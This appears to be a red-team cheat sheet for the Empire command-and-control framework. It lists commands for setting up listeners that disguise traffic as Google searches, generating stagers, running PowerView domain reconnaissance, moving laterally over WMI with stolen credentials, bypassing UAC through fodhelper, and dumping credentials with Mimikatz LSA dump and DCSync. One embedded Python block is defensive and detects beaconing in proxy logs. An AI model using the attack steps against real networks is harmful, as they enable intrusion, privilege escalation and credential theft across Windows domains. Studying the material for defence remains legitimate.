Empire

1. Installation

git clone https://github.com/BC-SECURITY/Empire.git

cd Empire && sudo ./setup/install.sh

./empire

2. Listeners

*Steps to set up a listener through a redirector with a high resilience level are in Hacking Infrastructure/Front-line Configuration/C2 Server

Basic options:

listeners

use listener {listener}

set Name {Name}

set Port {Port}

set Host {Host}

execute

To activate HTTPS:

set CertPath /root/Empire/data

Request pattern fuzziness:

set Jitter 1 (4 to 6 seconds)

Masquerading the listener requests:

set DefaultProfile {request_uri} | {user_agent} | {header_1} | {header_2}

*An example of masquerading the listener requests as Google search queries is in Hacking Infrastructure/Front-line Configuration/C2 Server
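As an added defender-side example (not part of this page or of Empire itself), the following Python flags the near-periodic request pattern that a listener with a small Jitter value leaves in web-proxy logs, even when DefaultProfile makes the traffic look like Google searches; the log layout, client addresses and thresholds are constructed assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (hypothetical layout: "<ISO time> <client> <host> <uri> <agent>").
# 10.0.0.5 hits the same Google-looking URI every ~5 s with small jitter;
# 10.0.0.7 is a person browsing at irregular intervals.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 www.google.com /search?q=empire Mozilla/5.0
2024-03-01T10:00:03 10.0.0.7 www.google.com /search?q=weather Mozilla/5.0
2024-03-01T10:00:05 10.0.0.5 www.google.com /search?q=empire Mozilla/5.0
2024-03-01T10:00:11 10.0.0.5 www.google.com /search?q=empire Mozilla/5.0
2024-03-01T10:00:15 10.0.0.5 www.google.com /search?q=empire Mozilla/5.0
2024-03-01T10:00:21 10.0.0.5 www.google.com /search?q=empire Mozilla/5.0
2024-03-01T10:00:26 10.0.0.5 www.google.com /search?q=empire Mozilla/5.0
2024-03-01T10:01:40 10.0.0.7 www.google.com /search?q=lunch Mozilla/5.0
2024-03-01T10:09:02 10.0.0.7 www.google.com /maps Mozilla/5.0
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (.*)$")


def parse_log(text):
    """Return (timestamp, client, host) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)))
    return events


def find_beacons(text, min_requests=5, max_cv=0.3):
    """Flag (client, host) pairs whose inter-request gaps are near-periodic."""
    groups = defaultdict(list)
    for ts, client, host in parse_log(text):
        groups[(client, host)].append(ts)
    findings = []
    for (client, host), stamps in groups.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        # Coefficient of variation: a fixed sleep plus small jitter stays low; browsing spreads widely.
        cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        if cv <= max_cv:
            findings.append({"client": client, "host": host, "requests": len(stamps),
                             "mean_interval": mean, "cv": round(cv, 3)})
    return findings
```

Tune min_requests and max_cv against your own baseline; a larger Jitter fraction raises the cv of a real beacon and will need a longer observation window.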

3. Stagers

usestager windows/launcher_bat

set Listener https_1

generate

4. PowerView embedded modules

usemodule powershell/situational_awareness/network/powerview/get_group

usemodule powershell/situational_awareness/network/powerview/get_user

usemodule powershell/situational_awareness/network/powerview/get_computer

usemodule powershell/situational_awareness/network/powerview/share_finder

usemodule powershell/situational_awareness/network/powerview/get_ou

Empire keeps a transcript of all commands, outputs, and files downloaded in the Empire/downloads/<agent_name> folder. The results of all the previous commands are stored in the agent.log file within that folder.

For example, to search for the string "Domain Admins":

grep -A10 "CN=Domain Admins" agent.log

5. Lateral movement

Using the information gathered by the previous modules about users whose credentials we have, we pass those credentials to the invoke_wmi module and target the server we want to move to.

creds add {Domain} {username} {password}

usemodule lateral_movement/invoke_wmi

set Listener https_1

set CredID 1

set ComputerName {computer-name}

run

6. Privesc modules

Empire marks admin sessions with a small star (*) next to the username.

To dig out users with at least local admin privileges over their workstations, we look for users with an admincount attribute greater than zero.

If we already have this information available in the results of the previous recon modules (get_user) we can grep for those users:

grep -E -B2 "admincount \s+: 1" agent.log

Empire contains a module that attempts to start a process in admin mode. This leads to the familiar Windows dialog asking for elevated credentials to execute the new process:

usemodule privesc/ask

set Listener https_1

run

Although we are in an admin account, the Empire session may not currently be using those full admin privileges.

To swap this low-privileged context for an admin one we would need to approve a prompt displayed on the graphical interface, which we don't have access to, so we use the following module to bypass that User Account Control (UAC) prompt:

usemodule privesc/bypass_fodhelper

run

7. Mimikatz modules

LSA Dump:

usemodule credentials/mimikatz/lsadump

run

Domain replication abuse (DCSync):

usemodule credentials/mimikatz/dcsync

run